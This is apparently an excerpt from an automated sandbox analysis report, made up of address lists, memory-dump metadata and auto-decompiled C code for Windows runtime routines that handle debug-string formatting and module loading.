                                                            0x048dbaf0
                                                            0x04922cb8
                                                            0x048dbaf6
                                                            0x048dbaf6
                                                            0x048dbaf6
                                                            0x048dbafd
                                                            0x048dbb1f
                                                            0x048dbb1f
                                                            0x048dbaff
                                                            0x048dbb00
                                                            0x048dbb00
                                                            0x048dbb03
                                                            0x048dbb03
                                                            0x048dbacb
                                                            0x048dbacf
                                                            0x048dbad0
                                                            0x048dbad1
                                                            0x048dbadc
                                                            0x048dbadc
                                                            0x048db980
                                                            0x048db980
                                                            0x048db988
                                                            0x048db98b
                                                            0x048db98d
                                                            0x048db990
                                                            0x048db993
                                                            0x048db999
                                                            0x048db99b
                                                            0x048db9a1
                                                            0x048db9a5
                                                            0x048db9aa
                                                            0x048db9b0
                                                            0x048db9bb
                                                            0x048db9c0
                                                            0x048db9c3
                                                            0x048db9ca
                                                            0x048db9cc
                                                            0x048db9cf
                                                            0x048db9d3
                                                            0x048db9d7
                                                            0x048dba94
                                                            0x048dba94
                                                            0x048dba98
                                                            0x048dbaa3
                                                            0x04922ccb
                                                            0x048dbaa9
                                                            0x048dbaa9
                                                            0x048dbaa9
                                                            0x048dbab1
                                                            0x04922cd5
                                                            0x04922cdd
                                                            0x04922cdd
                                                            0x048dbabb
                                                            0x048dbabc
                                                            0x048dbac2
                                                            0x048dbac3
                                                            0x048dbac3
                                                            0x048dbac6
                                                            0x00000000
                                                            0x048db9dd
                                                            0x048db9dd
                                                            0x048db9e7
                                                            0x048db9e7
                                                            0x048db9ec
                                                            0x048db9ec
                                                            0x048db9f1
                                                            0x048db9f5
                                                            0x048db9fa
                                                            0x048dba00
                                                            0x048dba0c
                                                            0x048dba10
                                                            0x048dba10
                                                            0x048dba12
                                                            0x048dba18
                                                            0x00000000
                                                            0x00000000
                                                            0x048dbb26
                                                            0x048dbb26
                                                            0x048dba1e
                                                            0x048dba1e
                                                            0x048dba23
                                                            0x048dba25
                                                            0x048dba2c
                                                            0x048dba30
                                                            0x048dba35
                                                            0x048dba35
                                                            0x048dba41
                                                            0x048dba46
                                                            0x048dba4c
                                                            0x048dba50
                                                            0x048dba54
                                                            0x048dba6a
                                                            0x048dba6e
                                                            0x048dba70
                                                            0x048dba74
                                                            0x048dba78
                                                            0x048dba7a
                                                            0x048dba7c
                                                            0x048dba8e
                                                            0x048dba90
                                                            0x048dba92
                                                            0x048dbb14
                                                            0x048dbb14
                                                            0x048dbb16
                                                            0x048dbb16
                                                            0x00000000
                                                            0x048dba7c
                                                            0x048dbb0a
                                                            0x048dbb0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048dbb0f

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048DB9A5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 885266447-0
                                                            • Opcode ID: 91a09896c4f70dd611fdd09b954353969b096cc091caab6e436c7b78406e7215
                                                            • Instruction ID: 3444f527801c2ec955912c755825285e3b5dd89ca84c518d84f345b15772c777
                                                            • Opcode Fuzzy Hash: 91a09896c4f70dd611fdd09b954353969b096cc091caab6e436c7b78406e7215
                                                            • Instruction Fuzzy Hash: 0F514671A0A344CFC720DF29C48092ABBE5FB88654F554E6EE585C7348EB70F844CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048BB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E048BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x498f7a8);
				E0490D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0490D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E048FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E048FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0490DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E048FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E048FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E048FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E048FA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                            0x048bb171
                                                            0x048bb171
                                                            0x048bb171
                                                            0x048bb171
                                                            0x048bb171
                                                            0x048bb176
                                                            0x048bb17b
                                                            0x048bb180
                                                            0x048bb186
                                                            0x048bb18f
                                                            0x048bb198
                                                            0x048bb1a4
                                                            0x048bb1aa
                                                            0x04914802
                                                            0x04914802
                                                            0x04914805
                                                            0x0491480c
                                                            0x0491480e
                                                            0x048bb1d1
                                                            0x048bb1d3
                                                            0x048bb1de
                                                            0x048bb1de
                                                            0x04914817
                                                            0x0491481e
                                                            0x04914820
                                                            0x04914822
                                                            0x04914822
                                                            0x04914824
                                                            0x04914824
                                                            0x0491482a
                                                            0x00000000
                                                            0x00000000
                                                            0x04914835
                                                            0x0491483a
                                                            0x0491483d
                                                            0x0491483f
                                                            0x04914842
                                                            0x04914842
                                                            0x04914842
                                                            0x04914846
                                                            0x0491484c
                                                            0x0491484e
                                                            0x04914851
                                                            0x04914851
                                                            0x04914853
                                                            0x04914854
                                                            0x04914854
                                                            0x04914858
                                                            0x0491485a
                                                            0x0491485a
                                                            0x0491485d
                                                            0x0491485f
                                                            0x04914861
                                                            0x04914861
                                                            0x04914866
                                                            0x0491486b
                                                            0x0491486e
                                                            0x04914871
                                                            0x04914876
                                                            0x04914876
                                                            0x04914878
                                                            0x0491487b
                                                            0x04914884
                                                            0x04914884
                                                            0x00000000
                                                            0x0491487d
                                                            0x0491487d
                                                            0x04914882
                                                            0x04914889
                                                            0x04914889
                                                            0x0491488f
                                                            0x04914891
                                                            0x049148e0
                                                            0x049148e2
                                                            0x049148e4
                                                            0x049148e4
                                                            0x049148e7
                                                            0x049148e7
                                                            0x049148ed
                                                            0x049148f4
                                                            0x049148f6
                                                            0x04914951
                                                            0x04914951
                                                            0x04914953
                                                            0x04914953
                                                            0x04914956
                                                            0x04914956
                                                            0x04914958
                                                            0x04914959
                                                            0x04914959
                                                            0x0491495d
                                                            0x0491495d
                                                            0x0491495f
                                                            0x0491495f
                                                            0x04914965
                                                            0x04914969
                                                            0x049149ba
                                                            0x049149ba
                                                            0x049149c1
                                                            0x049149c5
                                                            0x049149cc
                                                            0x049149d4
                                                            0x049149d7
                                                            0x049149da
                                                            0x049149e4
                                                            0x049149e5
                                                            0x049149f3
                                                            0x04914a02
                                                            0x00000000
                                                            0x04914a02
                                                            0x04914972
                                                            0x04914974
                                                            0x00000000
                                                            0x00000000
                                                            0x04914976
                                                            0x04914979
                                                            0x04914982
                                                            0x04914983
                                                            0x04914984
                                                            0x0491498b
                                                            0x0491498d
                                                            0x04914991
                                                            0x04914993
                                                            0x04914999
                                                            0x0491499d
                                                            0x049149a2
                                                            0x049149a2
                                                            0x049149a2
                                                            0x04914999
                                                            0x049149ac
                                                            0x00000000
                                                            0x049149b3
                                                            0x049148f8
                                                            0x049148fe
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x049148fe
                                                            0x04914895
                                                            0x0491489c
                                                            0x049148ad
                                                            0x049148b2
                                                            0x049148b5
                                                            0x049148b7
                                                            0x049148ba
                                                            0x049148bc
                                                            0x049148c6
                                                            0x049148c6
                                                            0x049148cb
                                                            0x049148d1
                                                            0x049148d4
                                                            0x049148d8
                                                            0x049148d8
                                                            0x00000000
                                                            0x049148d8
                                                            0x049148be
                                                            0x049148c0
                                                            0x00000000
                                                            0x00000000
                                                            0x049148c2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x049148c4
                                                            0x00000000
                                                            0x04914882
                                                            0x0491487b
                                                            0x04914904
                                                            0x04914906
                                                            0x00000000
                                                            0x00000000
                                                            0x04914908
                                                            0x0491490e
                                                            0x00000000
                                                            0x00000000
                                                            0x04914910
                                                            0x04914917
                                                            0x04914917
                                                            0x00000000
                                                            0x04914917
                                                            0x048bb1ba
                                                            0x049147f9
                                                            0x049147fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x049147fc
                                                            0x048bb1c0
                                                            0x048bb1c0
                                                            0x048bb1c3
                                                            0x048bb1cb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: _vswprintf_s
                                                            • String ID:
                                                            • API String ID: 677850445-0
                                                            • Opcode ID: a0e81533b8434848842caaba629c49ae4078f66b461ba914d791b621cb37c02c
                                                            • Instruction ID: ebd2ce67d32de4efa9bce1c0c7b1605ceb48fbd36e41ea817411ef5c879abc96
                                                            • Opcode Fuzzy Hash: a0e81533b8434848842caaba629c49ae4078f66b461ba914d791b621cb37c02c
                                                            • Instruction Fuzzy Hash: 5751E171D0025D8FEB30CF68C844BAEBBB5BF08714F2042BDD859AB2A1D7706941DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048CD5E0, Relevance: 1.6, Strings: 1, Instructions: 353COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E048CD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x49ad360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E048C6600(0x49a52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x49a7b9c; // 0x0
							_t281 = L048D4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E048FF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x49a7b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x49a7b8c; // 0x371d40
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x373f68
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E048D2280(_t200, 0x49a84d8);
									_t277 =  *0x49a85f4; // 0x372d78
									_t351 =  *0x49a85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x768d0000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x372108
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x372d10
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x372108
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x372f68
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E048CFFB0(_t287, _t353, 0x49a84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0490CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E048C6600(0x49a52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E048C7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x49ab239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0493E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x49a8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x49ab218; // 0x0
														asm("ror edi, cl");
														 *0x49ab1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E048D2280(_t250, 0x49a84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L048F3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E048CFFB0(_t293, _t353, 0x49a84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E048F37F5(_t353, 0);
																}
																E048F0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E048E9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E048E02D6(_t174);
																}
																L048D77F0( *0x49a7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E048EC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L048CEC7F(_t353);
										L048E19B8(_t287, 0, _t353, 0);
										_t200 = E048BF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E048FB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x49ab2f8; // 0x990000
									if((_t206 |  *0x49ab2fc) == 0 || ( *0x49ab2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x49ab2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04966B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04966AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E048CE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L048CEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E048F9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E048CE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
